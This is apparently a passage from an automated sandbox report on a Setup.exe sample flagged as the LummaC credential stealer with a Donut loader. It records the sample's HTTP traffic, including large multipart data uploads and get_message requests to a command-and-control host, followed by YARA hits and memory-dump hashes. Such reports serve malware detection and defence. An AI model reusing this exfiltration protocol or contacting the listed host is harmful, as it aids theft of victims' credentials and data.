                                                                                                                        Content-Type: multipart/form-data; boundary=TD2422N4K731TZUB2ZN
                                                                                                                        Cookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 551180
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 2d 2d 54 44 32 34 32 32 4e 34 4b 37 33 31 54 5a 55 42 32 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 44 32 37 39 33 30 34 37 33 32 34 35 31 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 54 44 32 34 32 32 4e 34 4b 37 33 31 54 5a 55 42 32 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 44 32 34 32 32 4e 34 4b 37 33 31 54 5a 55 42 32 5a 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a
                                                                                                                        Data Ascii: --TD2422N4K731TZUB2ZNContent-Disposition: form-data; name="hwid"7D279304732451ACAC8923850305D13E--TD2422N4K731TZUB2ZNContent-Disposition: form-data; name="pid"1--TD2422N4K731TZUB2ZNContent-Disposition: form-data; name="lid"CZJvss--
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 78 86 32 4c f7 38 95 aa 95 e2 07 49 6d fc d4 75 8c 89 13 dd cb 36 7e 60 f2 29 70 3c 9c aa 7c ff 3c 02 ea 0d 51 1a 0a df 8d 1b 06 3c c9 31 b1 fe 3f 97 11 f6 55 00 4d 5c ce cd b6 f8 cb 80 ed 93 7c 74 1a 5b 41 cc 74 81 ee 69 2c 10 bb a2 0e 2b e5 13 92 43 7c 0b ce 3a 0b 0a 04 48 13 d7 6f 8c 9f 88 13 a0 cd 17 ab 4f c5 df 09 b7 db 88 08 38 16 b6 97 61 f4 87 90 ad b3 f3 41 94 71 10 5e 1f 94 74 04 f9 4f e6 41 70 36 54 29 85 3f d2 0c 17 ee 07 0e 5a 9d 80 5c cd f3 16 44 aa 6f 5c 5a 14 b8 f1 6f cb c7 01 97 be b1 be 77 69 23 f6 43 4e ef d0 a1 9a f5 1b 57 a9 50 81 7d 45 87 49 c9 d5 c4 10 d7 c9 b4 28 14 dc bb df 47 c4 08 13 8a 4c 3b 31 34 2d 07 03 92 fc e3 a9 b9 a0 38 d8 d1 65 cd a1 41 03 3f 1d b0 74 f0 7d 9f 1e d8 6e 2c bf fb e6 d4 e8 e0 c5 dd fd de 37 4e f6 4a f7 4e
                                                                                                                        Data Ascii: x2L8Imu6~`)p<|<Q<1?UM\|t[Ati,+C|:HoO8aAq^tOAp6T)?Z\Do\Zowi#CNWP}EI(GL;14-8eA?t}n,7NJN
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 69 96 42 ca 47 8e e4 8b 61 de 63 9a a5 43 06 f2 7c ac e4 a4 2e 2d b5 4e a4 d4 4b 74 61 6a b5 14 de b6 06 e3 03 86 6b a9 26 dc ef 1f c7 e3 ca 46 27 a7 a7 a3 eb f4 27 94 9c 55 c0 4e c7 08 88 20 b7 0f 4f b5 0c 24 aa 28 29 46 c4 fd 7a 7f e2 98 7c a4 81 53 97 21 ce ef b8 0a 9f 1f 2f 5f ad ab 83 7b d4 58 f6 eb 5d 06 81 ff ae 9a f5 b4 c0 ab 12 1e 1e cd cf 23 1e 8b e6 17 5a 53 ea 5b 12 da d9 24 a7 fd 6a a3 f6 51 1c 41 0e 25 b4 07 67 f2 50 77 49 bc 52 e5 95 60 6a cb 9d d0 da 3d f9 93 72 fd fc df d5 b3 26 af 8c fe 3e 1b 7d 35 3d 64 1f df dd 20 d1 3e 6a b3 e1 f3 c6 68 d8 5f fc 97 62 ed 54 08 3f fa 27 b3 7b dd e9 8a df a3 4c 43 44 67 96 68 56 6e 8b ac d0 fa 70 ec b1 21 a8 3b 6a 4b e4 e9 8e 02 95 74 96 f2 04 2f 5d 24 43 e2 05 3b 58 34 5d 8c 39 be 39 cb ed 7e cf d1 6f
                                                                                                                        Data Ascii: iBGacC|.-NKtajk&F''UN O$()Fz|S!/_{X]#ZS[$jQA%gPwIR`j=r&>}5=d >jh_bT?'{LCDghVnp!;jKt/]$C;X4]99~o
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: d6 06 6e b9 ef d5 b1 db 1b 28 69 4c 33 7a 79 eb 59 2c 55 8c 5d 76 73 37 3d ca fa d3 b3 bd 9f d0 30 a3 72 c9 e5 c0 c6 8b 7e 81 9e cc 8a cf 23 35 15 2f ff 61 31 b9 f9 b1 a7 ab a7 56 fe 38 31 a9 cd e7 84 ba c6 7e 6e fd a6 fa 1a bb db bc e2 5c fb b4 3f 93 9a b7 17 38 0a 17 01 cc ad d3 c0 f1 c2 0e 9e 9d 3a bd b2 85 c2 2c b7 61 09 56 e9 81 36 0e 47 1d 1f 6e f3 75 fd d1 bd 08 ab 09 b9 c9 02 69 20 1b 13 72 cb 6b 1e a2 db 85 da 1b 7c 50 c7 cf f4 be 21 b7 99 3c 0d b7 d0 02 0e 1f 7f 6d 20 3e c2 14 78 c8 ff 7f 47 a0 23 99 a3 10 28 43 43 4d 06 e0 5a 59 2e 22 b2 24 22 35 4b 51 e0 42 c8 53 6d be 35 ba b8 2a f6 d5 2b c5 21 ad 1f 80 b0 87 e8 88 79 86 25 7e 99 74 f5 e0 06 16 3f 31 8c 52 41 81 c4 8f 9c 10 9b 08 9b c4 50 c3 26 ab d2 20 da f8 6c e3 82 ab 01 eb 2e dd f5 c6 4d
                                                                                                                        Data Ascii: n(iL3zyY,U]vs7=0r~#5/a1V81~n\?8:,aV6Gnui rk|P!<m >xG#(CCMZY."$"5KQBSm5*+!y%~t?1RAP& l.M
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 37 90 f3 aa a4 ec 73 ff 34 51 0e a2 2c 85 49 3d e3 a0 ff 17 15 2e d3 97 e7 bd b4 ed 69 84 79 be 8c 7c ed 02 98 4a 98 13 f2 6a 7e 8f 19 cb 48 34 b5 27 fe 1b 89 40 53 43 c5 f6 48 63 e7 51 9e 68 f3 76 94 b9 93 c6 af cb f8 97 7e 5b ef 41 74 c7 b9 00 56 1f 82 c4 32 02 98 be e9 74 9b 35 33 bb f3 e4 ea 09 ce 35 03 3c 7e 4a 37 f8 ab 64 20 96 07 23 8c e9 55 18 47 33 a2 8a ba 8d e6 64 3f 58 33 9a 8c b1 e1 42 8d f2 56 ee 99 4e 49 a3 23 e3 77 66 86 2a e2 37 5f 0a 50 f8 39 77 46 83 b1 f5 a4 da eb 4c 66 c4 df 83 e4 3a 89 48 e3 3a 04 3b 10 26 51 8e ba 44 a4 f5 a1 19 71 e5 ea e9 f0 3d be a5 a7 7c 2a 92 c9 96 f6 19 09 38 21 c1 fd 8c 92 3d bb 74 b8 a4 ef b2 a6 37 9e 49 44 1e e6 33 a9 fa b1 d2 a4 75 73 35 b3 75 8b 3b ac 49 07 23 04 5e 0f a8 8d 67 bd e1 02 7f be 8e 3d 89 ac
                                                                                                                        Data Ascii: 7s4Q,I=.iy|Jj~H4'@SCHcQhv~[AtV2t535<~J7d #UG3d?X3BVNI#wf*7_P9wFLf:H:;&QDq=|*8!=t7ID3us5u;I#^g=
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 8d d9 55 fd f7 fd 6e 0c 29 49 cd 54 8e fb 91 a8 1b 4c 8a 23 7d 7b 18 f5 fc b0 ac 28 70 6c 92 1b 8a d4 f9 fa 6d c9 32 bd a2 a3 29 9e 73 45 58 fc c7 df dc 0e 57 ec 1d 38 c8 1f 3a 81 09 f5 47 fd 58 c0 c5 66 d5 99 d0 cc c3 26 42 24 38 f3 4f 02 2b bd 58 09 2a d7 c6 c1 b2 6f 7a 45 61 f6 6e 19 d8 10 03 bf e4 62 d7 47 89 0e b6 bd 3a 4b ac ae ef 96 b0 bd f0 c2 8b a7 ff 3b 4c 73 3d 03 7b 87 4b 5a 84 fe 0a b1 13 55 65 22 a9 b0 cd 58 ad 28 cb 6e 5d ad f6 19 ca 50 f7 c3 bc d7 07 f7 67 9f b9 80 be b9 c6 38 b3 33 53 e4 2a 74 93 aa ae b9 8c 9e 45 2f e7 cc d8 1c 25 d3 59 4b aa b4 31 00 de a2 19 f3 ac 3e 52 9a 08 20 ec 11 8b 52 e2 66 37 6c af 0d fe bb 2e 39 52 c3 ec 9c fa 99 20 77 dc 19 de 07 1a 54 76 f6 3b cc b6 40 18 70 48 8a 21 df 00 53 c3 2e 71 81 07 e2 0c 3d 44 da dd
                                                                                                                        Data Ascii: Un)ITL#}{(plm2)sEXW8:GXf&B$8O+X*ozEanbG:K;Ls={KZUe"X(n]Pg83S*tE/%YK1>R Rf7l.9R wTv;@pH!S.q=D
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 0c db fc bf 6b c7 fe e7 a8 d5 e9 ed f3 df 6e 54 93 d2 95 15 ff b4 8b 38 02 0c 9b c2 21 ec 28 2e 6a 72 c4 47 eb f9 c7 b1 78 97 3b 81 df 8e 3c 5a da ca f4 32 de 27 b2 e1 e5 28 a0 50 dd f3 d2 1b 53 34 7c 19 87 47 7c ff 9d 8e 1d 2b 5e 30 27 f1 7f dd 6c 47 d4 01 69 a7 2a a3 9b d9 e6 a9 be 4f 1c 5c f9 27 75 47 ac 33 0f a2 48 10 26 94 f6 d8 23 c7 e6 6b 21 30 fb 2c 14 22 ca 65 29 43 8e c2 bd 27 39 5a e7 d2 b8 f7 7a d0 31 7d 78 97 8b c4 40 de fb 91 16 6d 9b 9a b5 a2 59 1e 72 25 6b 9a 99 23 d4 29 1a ee 22 59 1c 51 7d 04 58 8c 66 6a a0 be 63 7b ff d2 86 2b 1a ae e2 20 b5 06 6c ec d5 c8 72 c8 da d1 5e 02 f0 d4 38 41 c4 a1 10 3c ab d8 39 3b 4b 64 92 75 78 f0 fb 15 4a e5 ae db 4a cc 91 09 96 a5 58 16 36 ec e7 af 56 ff df 05 be cc c3 cc 92 e2 63 c2 0b 97 63 32 75 30 c6
                                                                                                                        Data Ascii: knT8!(.jrGx;<Z2'(PS4|G|+^0'lGi*O\'uG3H&#k!0,"e)C'9Zz1}x@mYr%k#)"YQ}Xfjc{+ lr^8A<9;KduxJJX6Vcc2u0
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 5c d1 db fa 64 ab f6 cd 2f 0b 42 4a 82 8c 15 db 88 47 07 87 f3 17 0d 6c 7a b3 8b 3b da d1 6d 7f 0c 05 83 c0 23 28 c3 61 6f e9 a5 62 b9 94 11 97 53 9b d2 08 cf 65 e7 4c e3 26 f4 29 44 68 24 d6 0b a9 4e 5d cd 4e dd f5 06 03 5c ce af cb b1 e2 9d f1 f2 c1 df 7d 61 6d 7c 71 d2 37 df a1 fc 6b 53 19 2c bd 1d 7b 59 44 46 13 ba 49 56 11 c1 54 ec 35 48 d8 a8 e2 10 ee e5 98 ee ef 1f 89 a2 28 8c de 5a 25 57 1e e7 e8 d5 57 73 53 fe 01 3d 8a 90 86 d1 31 ad 95 ea 65 0f 6b 4b 9c 98 c8 b0 fa 94 10 ce ed e3 4f 2e b0 2a 1d 9c 3a 92 7b 24 34 f9 c8 c9 f3 ff 4e 9b b1 48 eb a2 3b ec 88 92 6f 6c b1 6d b3 72 51 2b 3d a7 a1 8c 6c 9f c4 9d 17 97 a6 0d 47 3f d9 41 9f 79 9e c0 67 b1 60 5e b8 2f fd 1c d0 5a 38 40 2c 41 20 8e f2 6e ca f6 5f 49 1b c0 02 72 38 74 8e 0f 94 5b b9 ff f2 76
                                                                                                                        Data Ascii: \d/BJGlz;m#(aobSeL&)Dh$N]N\}am|q7kS,{YDFIVT5H(Z%WWsS=1ekKO.*:{$4NH;olmrQ+=lG?Ayg`^/Z8@,A n_Ir8t[v
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 70 64 93 d8 fe ff ff c4 84 33 80 d3 76 f4 03 b2 b8 73 a8 5d 86 a8 0e fd c8 1f ef 7c b7 2e 6b cb 4f 54 9b 13 34 05 80 04 56 2a d5 3d 4f 8d b0 a0 a7 67 84 3e 7a b7 41 7f e8 c4 80 6f fa 93 d6 ee cf 0f f3 cd 04 79 b7 e6 ed 3f 19 51 ff 77 4b 4c 10 84 f8 2c 2e a2 81 36 fe 0a 0e bc 45 17 0a a0 86 c9 64 c9 7f 82 d3 b4 7d 12 37 8f d5 58 1a f3 fb ea 20 18 30 e0 04 39 47 96 da 8b a2 07 38 14 2a 0d 73 25 0f f7 4b 8d b8 c6 63 47 54 e9 02 18 6d 96 67 34 35 18 e0 d7 1f b3 c6 56 00 9f 8a f9 e0 71 91 37 5b 71 fb a6 ad d0 bc 76 3e 7c 66 ce 54 cd 89 53 9b cf 2a 52 8d 79 05 c7 c4 ef 41 b0 51 b7 fe fa 15 07 09 d4 f5 84 09 08 dc 20 e0 1a 70 f5 ca 51 21 bb a9 fc 00 c2 41 2b c4 bd a1 3b b9 76 ad 39 b3 64 17 1b 53 a7 11 ec 65 4b bc 07 e6 35 3a 89 90 74 b0 c6 18 9d b4 89 28 c0 6d
                                                                                                                        Data Ascii: pd3vs]|.kOT4V*=Og>zAoy?QwKL,.6Ed}7X 09G8*s%KcGTmg45Vq7[qv>|fTS*RyAQ pQ!A+;v9dSeK5:t(m
                                                                                                                        2024-12-24 01:59:25 UTC15331OUTData Raw: 95 64 11 d2 ae f5 9b 46 da 6b 0e ea 99 7c 91 ce 23 27 23 e8 2f 6f 4a 4e 98 5a 7e 8a e6 df e0 f3 21 a0 6b af a3 09 67 f8 af 49 0a 3a ce eb d3 04 be da ff df 4b 6f ac e3 f4 4e 66 42 7c 4c 62 d9 4e 43 5e e6 5d 35 2f 41 c4 1b b3 e8 b1 c6 44 c0 b0 3b 0a f2 0f cf a8 40 f9 bf cc 98 ee 0e c3 17 af 7e 11 ad dc 79 b3 98 ad 81 80 c8 2f ae a9 a7 bd 59 57 f3 c3 19 09 f9 4b 35 13 2e 53 f0 44 6d 13 a9 02 ad 2e 60 d9 ba 23 f4 28 0c c3 d4 a0 18 b5 42 53 9c b7 fb f5 e5 22 95 94 09 00 3b 39 7a c7 f9 1b 43 be b3 03 3d 3d a4 0f b8 ce 1f 18 ad 09 ef b9 2d e0 18 b4 f0 6a de 5e 85 d8 42 cf f2 18 ac 94 1b 2c b9 eb 92 2f b6 30 10 26 15 e9 dd ac dc 31 b6 54 ac 4d 8f a2 d6 cd 7a e4 85 20 dc 0b 18 fb 73 7d ec 15 61 10 e2 3d 37 2b 0f 87 f9 41 af 35 93 26 3e ec 49 81 45 1d 3f 51 25 59
                                                                                                                        Data Ascii: dFk|#'#/oJNZ~!kgI:KoNfB|LbNC^]5/AD;@~y/YWK5.SDm.`#(BS";9zC==-j^B,/0&1TMz s}a=7+A5&>IE?Q%Y
                                                                                                                        2024-12-24 01:59:28 UTC1147INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:28 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=tk0iibbo4sj5rlv3akkucjp186; expires=Fri, 18 Apr 2025 19:46:06 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZV%2F%2Bsf9dAjz1vjJO%2BuWJNdmzJGSGLiAozBQS5rJtCRzMgfz%2Fd1bwI%2BMFxxDb6xMMZheh8tz9OuvTnhqvXS%2B8WI2FHCEOd%2FpGXoN%2B0JfmDa3hgl6EH9%2BhL71Vf7Lbd9YTRFFlnc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfdf32e7c3338-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1791&min_rtt=1783&rtt_var=685&sent=314&recv=573&lost=0&retrans=0&sent_bytes=2842&recv_bytes=553753&delivery_rate=1580086&cwnd=245&unsent_bytes=0&cid=668b7342c0a4f23e&ts=2468&x=0"


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.449744172.67.177.884435064C:\Users\user\Desktop\Setup.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-12-24 01:59:29 UTC355OUTPOST /api HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Cookie: __cf_mw_byp=hQv64SvizH_hIw.gtxtZwh7O0y57R_Bbkxkmg0Nx3b0-1735005551-0.0.1.1-/api
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                        Content-Length: 77
                                                                                                                        Host: cheapptaxysu.click
                                                                                                                        2024-12-24 01:59:29 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d 26 68 77 69 64 3d 37 44 32 37 39 33 30 34 37 33 32 34 35 31 41 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45
                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=CZJvss--&j=&hwid=7D279304732451ACAC8923850305D13E
                                                                                                                        2024-12-24 01:59:30 UTC1124INHTTP/1.1 200 OK
                                                                                                                        Date: Tue, 24 Dec 2024 01:59:30 GMT
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: PHPSESSID=q4q3eb8en8k6e5cog0ortfedod; expires=Fri, 18 Apr 2025 19:46:09 GMT; Max-Age=9999999; path=/
                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                        Pragma: no-cache
                                                                                                                        X-Frame-Options: DENY
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                        vary: accept-encoding
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OAQDhbk7cq4h3MbU2bGkbLpA7DOoHH9xbrQYOqk7FLqWVI4d5p4scfMXWYHoBNF9mXj0BbCSAeieT6sVU9Kb578mBEzSJr3JjDvlty2qptQGBCq%2BK2a4EMHZU3stLubXZLXOcv8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 8f6cfe0b1dd30c7a-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1808&min_rtt=1526&rtt_var=774&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1068&delivery_rate=1913499&cwnd=200&unsent_bytes=0&cid=57957e61d1d99679&ts=770&x=0"
                                                                                                                        2024-12-24 01:59:30 UTC54INData Raw: 33 30 0d 0a 78 42 39 49 61 56 4c 4d 38 30 36 39 6f 49 46 72 6d 42 7a 6a 36 71 6d 50 61 38 54 49 57 62 61 6c 32 36 67 7a 58 68 7a 33 42 4a 53 66 51 67 3d 3d 0d 0a
                                                                                                                        Data Ascii: 30xB9IaVLM8069oIFrmBzj6qmPa8TIWbal26gzXhz3BJSfQg==
                                                                                                                        2024-12-24 01:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 0


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Target ID:0
                                                                                                                        Start time:20:58:55
                                                                                                                        Start date:23/12/2024
                                                                                                                        Path:C:\Users\user\Desktop\Setup.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\Setup.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:3'467'041 bytes
                                                                                                                        MD5 hash:95FB898CCBB30CC75342F7AFCA4D6FA7
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1924884334.0000000000B86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1948547034.0000000000B8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2013654443.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Reset < >
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000003.1927185974.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, Offset: 00B57000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_3_b57000_Setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: =$a[QF
                                                                                                                          • API String ID: 0-3792430483
                                                                                                                          • Opcode ID: 72346e1c2c2d43e1dee3968921398a9a13a5206f361f8c8a6dace3f4dce9577a
                                                                                                                          • Instruction ID: 25f353930a5803359c1497ed184cee0a6a464d9a3aff798b55c41209fb0b2a46
                                                                                                                          • Opcode Fuzzy Hash: 72346e1c2c2d43e1dee3968921398a9a13a5206f361f8c8a6dace3f4dce9577a
                                                                                                                          • Instruction Fuzzy Hash: 36E1AC6284F3D15FC7038B7498A55957FB0AE13318B2E45CBC4C0CF1A3E2296A5AC767
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000003.1927185974.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, Offset: 00B57000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_3_b57000_Setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7ea8484b2008e90714b942ecae604f9339b3e535b95e01624b13c62aee3a344f
                                                                                                                          • Instruction ID: 2e64a959465a1405da764848776824924d01699eda6b251e4c8b823f5d92b972
                                                                                                                          • Opcode Fuzzy Hash: 7ea8484b2008e90714b942ecae604f9339b3e535b95e01624b13c62aee3a344f
                                                                                                                          • Instruction Fuzzy Hash: AB81EC3140E7C19FC71B8B3488656927FB1EF43314B5985EEC4C09F4A3D2299A4ACB92
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000003.1927185974.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, Offset: 00B57000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_3_b57000_Setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6ed05a653ddd84a716bdee8dc2e2ce0a7f087bf31e1808b581324bb5cdcf4b72
                                                                                                                          • Instruction ID: f0afce6afc374bbc21fc7fbbbb004f9615f56c3d4a79b01d54d3f8ec0fa4da8f
                                                                                                                          • Opcode Fuzzy Hash: 6ed05a653ddd84a716bdee8dc2e2ce0a7f087bf31e1808b581324bb5cdcf4b72
                                                                                                                          • Instruction Fuzzy Hash: 7021F2661092D58FD317CF74D594A82BFA2FF8B71639E40DCC9C18F427C2A66542CB52
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000003.1927185974.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, Offset: 00B57000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_3_b57000_Setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 38d0865f1399163441a851a1381f442944d1653f427467189598b9b4ff45cc41
                                                                                                                          • Instruction ID: 25a50da0bdcccd24343300dad45719bc86778996e296397596ecfdaf32177d1d
                                                                                                                          • Opcode Fuzzy Hash: 38d0865f1399163441a851a1381f442944d1653f427467189598b9b4ff45cc41
                                                                                                                          • Instruction Fuzzy Hash: CE21DE360196C18BC72BDF74C4212C63FB5FF8731971996E9C8D1AE427C326A50ACB46